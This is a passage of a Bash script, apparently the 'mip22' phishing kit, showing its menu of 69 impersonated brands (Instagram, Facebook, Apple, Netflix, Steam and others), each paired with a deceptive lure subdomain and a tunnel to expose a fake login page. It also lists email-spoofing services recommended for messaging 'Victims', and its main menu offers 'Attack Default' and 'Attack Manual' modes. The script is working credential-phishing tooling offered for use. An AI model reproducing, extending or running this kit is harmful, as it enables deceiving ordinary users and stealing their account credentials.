  488. ${GREEN}[${WHITE}19${GREEN}]${CYAN} Icloud ${GREEN}[${WHITE}43${GREEN}]${CYAN} Reverbnation ${GREEN}[${WHITE}66${GREEN}]${CYAN} Xing
  489. ${GREEN}[${WHITE}20${GREEN}]${CYAN} Influenster ${GREEN}[${WHITE}44${GREEN}]${CYAN} Signal ${GREEN}[${WHITE}67${GREEN}]${CYAN} Yahoo
  490. ${GREEN}[${WHITE}21${GREEN}]${CYAN} Instagram ${GREEN}[${WHITE}45${GREEN}]${CYAN} Skype ${GREEN}[${WHITE}68${GREEN}]${CYAN} Yandex
  491. ${GREEN}[${WHITE}22${GREEN}]${CYAN} Insta Followers ${GREEN}[${WHITE}46${GREEN}]${CYAN} Skyrock ${GREEN}[${WHITE}69${GREEN}]${CYAN} Youtube SUbs
  492. ${GREEN}[${WHITE}23${GREEN}]${CYAN} Insta Followers 2 ${GREEN}[${WHITE}47${GREEN}]${CYAN} Snapchat ${GREEN}[${WHITE}99${GREEN}]${MAGENTA} Main Menu
  493. ${GREEN}[${WHITE}24${GREEN}]${CYAN} Instagram Verify
  494. EOF
  495. read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select an option : ${WHITE}"${WHITE}
  496. case $REPLY in
  497. 1)
  498. site="adobe"
  499. subdomain='http://adobe-pro-membership-lifetime-for-you'
  500. tunnel;;
  501. 2)
  502. site="amazon"
  503. subdomain='http://amazon-pro-membership-lifetime-for-you'
  504. tunnel;;
  505. 3)
  506. site="apple"
  507. subdomain='http://apple-security-account-login'
  508. tunnel;;
  509. 4)
  510. site="badoo"
  511. subdomain='http://get-2000-euro-free-for-your-acount'
  512. tunnel;;
  513. 5)
  514. site="care2"
  515. subdomain='http://get-2000-tokens-free-for-your-acount'
  516. tunnel;;
  517. 6)
  518. site="clashofclans"
  519. subdomain='http://get-free-character-for-clashofclans-game'
  520. tunnel;;
  521. 7)
  522. site="crunchyroll"
  523. subdomain='http://get-free-character-for-crunchyroll-game'
  524. tunnel;;
  525. 8)
  526. site="deviantart"
  527. subdomain='http://deviantart-upgrade-account-pro-for-free'
  528. tunnel;;
  529. 9)
  530. site="discord"
  531. subdomain='http://discord-upgrade-account-pro-for-free'
  532. tunnel;;
  533. 10)
  534. site="dota2"
  535. subdomain='http://dota-upgrade-account-pro-for-free'
  536. tunnel;;
  537. 11)
  538. site="dropbox"
  539. subdomain='http://get-2TB-cloud-storage-free'
  540. tunnel;;
  541. 12)
  542. site="ebay"
  543. subdomain='http://ebay-upgrade-account-for-free'
  544. tunnel;;
  545. 13)
  546. site="facebook"
  547. subdomain='http://secure-verified-account-for-facebook'
  548. tunnel;;
  549. 14)
  550. site="facebook_messenger"
  551. subdomain='http://messenger-premium-features-for-free'
  552. tunnel;;
  553. 15)
  554. site="facebook_security"
  555. subdomain='http://make-your-facebook-secured-from-hackers'
  556. tunnel;;
  557. 16)
  558. site="gmail"
  559. subdomain='http://get-unlimited-google-drive-free'
  560. tunnel;;
  561. 17)
  562. site="goodreads"
  563. subdomain='http://goodreads-updrade-account-lifetime-free'
  564. tunnel;;
  565. 18)
  566. site="hotstar"
  567. subdomain='http://hotstar-premieum-account-for-free'
  568. tunnel;;
  569. 19)
  570. site="icloud"
  571. subdomain='http://get-2TB-cloud-storage-free'
  572. tunnel;;
  573. 20)
  574. site="influenster"
  575. subdomain='http://update-account-to-premium-free'
  576. tunnel;;
  577. 21)
  578. site="instagram"
  579. subdomain='http://secure-login-for-instagram'
  580. tunnel;;
  581. 22)
  582. site="instagram_followers"
  583. subdomain='http://get-10000-followers-for-instagram'
  584. tunnel;;
  585. 23)
  586. site="instagram_followers_2"
  587. subdomain='http://get-10000-followers-for-instagram'
  588. tunnel;;
  589. 24)
  590. site="instagram_verify"
  591. subdomain='http://instagram-verify-account'
  592. tunnel;;
  593. 25)
  594. site="line"
  595. subdomain='http://line-get-free-tokens-for-speech'
  596. tunnel;;
  597. 26)
  598. site="linkedin"
  599. subdomain='http://get-a-premium-plan-for-linkedin-free'
  600. tunnel;;
  601. 27)
  602. site="livejournal"
  603. subdomain='http://get-a-premium-plan-for-livejournal-free'
  604. tunnel;;
  605. 28)
  606. site="mediafire"
  607. subdomain='http://get-2TB-cloud-storage-free'
  608. tunnel;;
  609. 29)
  610. site="mewe"
  611. subdomain='http://mewe-update-account-to-premium-free'
  612. tunnel;;
  613. 30)
  614. site="microsoft"
  615. subdomain='http://unlimited-onedrive-space-for-free'
  616. tunnel;;
  617. 31)
  618. site="mocospace"
  619. subdomain='http://upgrade-your-mocospace-plan-free'
  620. tunnel;;
  621. 32)
  622. site="myspace"
  623. subdomain='http://upgrade-your-myspace-plan-free'
  624. tunnel;;
  625. 33)
  626. site="netflix"
  627. subdomain='http://upgrade-your-netflix-plan-free'
  628. tunnel;;
  629. 34)
  630. site="origin"
  631. subdomain='http://origin-upgrade-to-premium-account-free'
  632. tunnel;;
  633. 35)
  634. site="outlook"
  635. subdomain='http://unlimited-onedrive-space-for-free'
  636. tunnel;;
  637. 36)
  638. site="pinterest"
  639. subdomain='http://get-a-premium-plan-for-pinterest-free'
  640. tunnel;;
  641. 37)
  642. site="playstation"
  643. subdomain='http://playstation-premium-account-free'
  644. tunnel;;
  645. 38)
  646. site="protonmail"
  647. subdomain='http://protonmail-pro-basics-for-free'
  648. tunnel;;
  649. 39)
  650. site="pubg"
  651. subdomain='http://get-free-character-for-pubs-game'
  652. tunnel;;
  653. 40)
  654. site="quora"
  655. subdomain='http://get-quora-premium-account-for-free-lifetime'
  656. tunnel;;
  657. 41)
  658. site="raverly"
  659. subdomain='http://get-raverly-premium-account-for-free-'
  660. tunnel;;
  661. 42)
  662. site="reddit"
  663. subdomain='http://reddit-official-verified-member-badge'
  664. tunnel;;
  665. 43)
  666. site="reverbnation"
  667. subdomain='http://get-reverbnation-premium-account-for-free-'
  668. tunnel;;
  669. 44)
  670. site="signal"
  671. subdomain='http://signal-get-free-tokens-for-speech'
  672. tunnel;;
  673. 45)
  674. site="skype"
  675. subdomain='http://skype-get-free-tokens-for-speech'
  676. tunnel;;
  677. 46)
  678. site="skyrock"
  679. subdomain='http://skyrock-upgrade-to-premium-account-free'
  680. tunnel;;
  681. 47)
  682. site="snapchat"
  683. subdomain='http://view-locked-snapchat-accounts-secretly'
  684. tunnel;;
  685. 48)
  686. site="socialclub"
  687. subdomain='http://-socialclub-update-account-to-premieum-free'
  688. tunnel;;
  689. 49)
  690. site="spotify"
  691. subdomain='http://convert-your-account-to-spotify-premium'
  692. tunnel;;
  693. 50)
  694. site="stackoverflow"
  695. subdomain='http://stackoverflow-convert-your-account-to-premium'
  696. tunnel;;
  697. 51)
  698. site="steam"
  699. subdomain='http://steam-convert-your-account-to-premium'
  700. tunnel;;
  701. 52)
  702. site="tagget"
  703. subdomain='http://tagget-convert-your-account-to-premium'
  704. tunnel;;
  705. 53)
  706. site="telegram"
  707. subdomain='http://telegram-get-free-tokens-for-speech'
  708. tunnel;;
  709. 54)
  710. site="tiktok"
  711. subdomain='http://get-tiktok-100000-followers-free-at-instant'
  712. tunnel;;
  713. 55)
  714. site="tiktok_followers"
  715. subdomain='http://get-tiktok-100000-followers-free-at-instant'
  716. tunnel;;
  717. 56)
  718. site="tumblr"
  719. subdomain='http://tumblr-upgrade-account-to-premium-free'
  720. tunnel;;
  721. 57)
  722. site="twitch"
  723. subdomain='http://unlimited-twitch-tv-user-for-free'
  724. tunnel;;
  725. 58)
  726. site="twitter"
  727. subdomain='http://get-blue-badge-on-twitter-free'
  728. tunnel;;
  729. 59)
  730. site="viber_out"
  731. subdomain='http://viber-get-free-tokens-for-speech'
  732. tunnel;;
  733. 60)
  734. site="vimeo"
  735. subdomain='http://get-100000-views-for-channel-free'
  736. tunnel;;
  737. 61)
  738. site="vk"
  739. subdomain='http://vk-premium-real-method-2022-free'
  740. tunnel;;
  741. 62)
  742. site="whatsapp"
  743. subdomain='http://get-3000-free-tokens-for-free'
  744. tunnel;;
  745. 63)
  746. site="wordpress"
  747. subdomain='http://get-unlimited-wordpress-traffic-free'
  748. tunnel;;
  749. 64)
  750. site="xanga"
  751. subdomain='http://xanga-update-account-to-premieum'
  752. tunnel;;
  753. 65)
  754. site="xbox"
  755. subdomain='http://xbox-premium-account-new-method-2022'
  756. tunnel;;
  757. 66)
  758. site="xing"
  759. subdomain='http://xing-update-account-to-premieum'
  760. tunnel;;
  761. 67)
  762. site="yahoo"
  763. subdomain='http://grab-mail-from-anyother-yahoo-account-free'
  764. tunnel;;
  765. 68)
  766. site="yandex"
  767. subdomain='http://grab-mail-from-anyother-yandex-account-free'
  768. tunnel;;
  769. 69)
  770. site="youtube_subs"
  771. subdomain='http://get-100000-youtube-subscribers-free'
  772. tunnel;;
  773. #70)
  774. #setup_clone_manual
  775. #tunnel;;
  776. 99) menu;;
  777. *)
  778. echo -ne "\n${GREEN}[${WHITE}!${GREEN}]${RED} Invalid Option, Try Again..."
  779. { sleep 0.7; attack;};;
  780. esac
  781. }
  782. attack_manual() {
  783. subdomain='http:secure-login-page'
  784. tunnel_manual
  785. }
  786. email() {
  787. { clear; header; echo; }
  788. echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Use this services for send email to Victims \n"
  789. echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${CYAN} https://www.guerrillamail.com/ \n"
  790. echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${CYAN} https://emkei.cz/ ${MAGENTA} (recommended) \n"
  791. echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${CYAN} https://mailspre.com/ \n"
  792. echo -ne "\n\n"
  793. cat <<- EOF
  794. ${GREEN}[${WHITE}99${GREEN}]${CYAN} Main Menu
  795. EOF
  796. read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select an option : ${WHITE}"${WHITE}
  797. case $REPLY in
  798. 99) menu;;
  799. *)
  800. echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."
  801. { sleep 0.7; email;};;
  802. esac
  803. }
  804. menu() {
  805. { clear; header; echo; }
  806. cat <<- EOF
  807. ${GREEN}[${WHITE}1${GREEN}]${CYAN} Attack Default
  808. ${GREEN}[${WHITE}2${GREEN}]${CYAN} Attack Manual
  809. ${GREEN}[${WHITE}3${GREEN}]${CYAN} Apis
  810. ${GREEN}[${WHITE}4${GREEN}]${CYAN} Email
  811. ${GREEN}[${WHITE}5${GREEN}]${CYAN} Vpn
  812. ${GREEN}[${WHITE}6${GREEN}]${CYAN} Sound (pc only)
  813. ${GREEN}[${WHITE}0${GREEN}]${ORANGE} Exit
  814. EOF
  815. read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select an option : ${WHITE}"${WHITE}
  816. case $REPLY in
  817. 1) attack;;
  818. 2) attack_manual;;
  819. 3) apis;;
  820. 4) email;;
  821. 5) vpn_setup;;
  822. 6) play_music;;
  823. help) help;;
  824. 0)
  825. echo -ne "\n${GREEN}[${WHITE}!${GREEN}]${ORANGE} Thanks for using mip22 "${WHITE}
  826. sleep 2
  827. clear
  828. exit 1;;
  829. *)
  830. echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."
  831. { sleep 0.7; menu;};;
  832. esac
  833. }
  834. check_os_and_install_packages
  835. check_root_and_os
  836. pid_kill
  837. menu